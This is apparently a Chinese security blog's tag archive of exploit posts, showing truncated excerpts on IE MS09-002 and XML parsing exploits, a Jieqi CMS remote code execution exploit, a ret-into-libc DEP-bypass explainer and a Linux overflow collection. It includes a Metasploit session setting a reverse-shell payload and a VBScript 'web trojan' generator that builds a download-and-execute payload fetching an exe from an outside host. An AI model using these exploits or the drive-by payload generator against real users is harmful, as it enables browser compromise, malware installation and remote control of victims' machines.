标签 ‘Exploit’ 下的日志

动易SiteWeaver6.6版最新漏洞利用工具

作者:Cschii
来源:黑客防线
阅读全文 »

Tags: , , ,

MS09_002 Memory Corruption Exploit

来源:Carnal0wnage Blog

Details to follow. :-)

msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
阅读全文 »

Tags: ,

Internet Explorer 7.0 Exploit(MS09-002,可以执行任意代码)

作者:Friddy

Microsoft IE CFunctionPointer函数内存破坏漏洞(MS09-002)
发布时间:2009-02-10
影响版本:
Microsoft Internet Explorer 7.0

漏洞描述:
BUGTRAQ ID: 33627
CVE(CAN) ID: CVE-2009-0075
阅读全文 »

Tags: ,

Jieqi cms v1.5 remote code execution exploit

作者:flyh4t

http://bbs.wolvez.org

转个exp出来迎接新年
阅读全文 »

Tags: ,

通过ret-into-libc方法编写通用exp的一个小技巧

作者:螺螺

科普文,牛人请绕道,谢谢。

ms07029和ms08067这两个NB漏洞都使用ret-into-libc方法来绕过DEP数据执行保护,首先来科普下什么是ret-into- libc,一般的栈溢出控制eip后通过一些op code来跳到栈里执行shellcode,但是开启了数据执行保护的话,这种方法就不行了,那么我们只能控制eip往可以执行的地方跳,我们只能在可执 行的地方找到符合我们要求的指令,来帮我们干活,干完活后我们还需要收回控制权,那么在干活指令后必须有一个ret(n),这样我们才有可能继续控制流程 跳转到另一个地方去干下一个活,理论上,通过构造stack frame也能完成shellcode的功能。但是这只是理论上说,谁也不会傻到整个shellcode通过stack frame跳来跳去来实现,一般只是利用这个技巧去执行ZwSetInformationProcess函数来关闭DEP,然后ret(n)回去用普通的 办法执行shellcode。
阅读全文 »

Tags: ,

天阳论坛整理的各个版本linux溢出集合

下载地址: http://bbs.tian6.com/linux_exp/index.htm

Tags: ,

MS Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)

<!–

IE XML Heap Corruption exploit

by krafty

greets to hdm, ddz, SK, muts, halvar, grugq, and all the ethnical hackers

sux to exploit traders – ZDI, WabiSabiLabi, and all you h0arders.

Bring back the days of technotronic and r00tshell! Freedom.

poc: launches calculator.
Tested with IE7 XP SP2, SP3, Vista.

–>
阅读全文 »

Tags: , ,

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day 网马生成器

作者:lcx

‘code by lcx

On Error Resume Next
Exeurl = InputBox( “请输入exe的地址:”, “输入”, “http://www.haiyangtop.net/333.exe” )
url=”http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL=”&URLEncoding(Exeurl)&”&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload”
阅读全文 »

Tags: , , , ,